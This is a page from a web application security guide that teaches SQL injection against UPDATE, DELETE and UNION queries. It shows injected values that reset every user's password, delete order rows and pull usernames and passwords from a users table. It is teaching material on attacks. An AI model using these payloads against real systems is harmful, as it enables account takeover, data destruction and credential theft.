Web application security - the fast guide 1.1 | Page 124

Chapter 6 - Attack execution (2)

UPDATE users SET password='theNewPass' WHERE user = 'sami' and password = 'oldPassword'

Attack:
If the value of the user parameter is set to ( admin' or 1=1-- ) the resulting query becomes:

UPDATE users SET password='theNewPass' WHERE user = 'admin' or 1=1

Because the WHERE clause is now true for every row, the new password is written to every account, including admin.

6.9.4 Attacking Delete statement

Using a method similar to the one used with the update statement, an attacker can cause great damage by injecting into a delete statement. The following listing is dedicated to removing an order item from an order.

Listing:
DELETE FROM orders WHERE order_item_code='p23453' and order_Id=12

Attack:
Setting the order_item_code value to ( ' or 1=1 ) will cause the deletion of all orders in the orders table.

DELETE FROM orders WHERE order_item_code='' or 1=1 and order_Id=12

Note that AND binds more tightly than OR, so the database evaluates this as order_item_code='' or (1=1 and order_Id=12): every item of order 12 is deleted rather than a single item, and the whole table is reached only if the trailing order_Id condition is neutralised as well, as the -- comment in the previous example does.

6.9.5 Attacking Using UNION

Using UNION opens the door wide to executing a separate SELECT query. A simple query like the one shown in the following listing can be exploited to retrieve user names and passwords for all users.

Listing:
Select * from titles where username='sami'

Attack:
Setting the username value to ( sami' UNION SELECT uid,username,password FROM users-- ) gives:

Select * from titles where username='sami' UNION SELECT uid,username,password FROM users--

For the database to accept the UNION, the injected SELECT must return the same number of columns as the original query (three here, so titles must have three columns) with compatible types; a mismatch produces an error instead of data.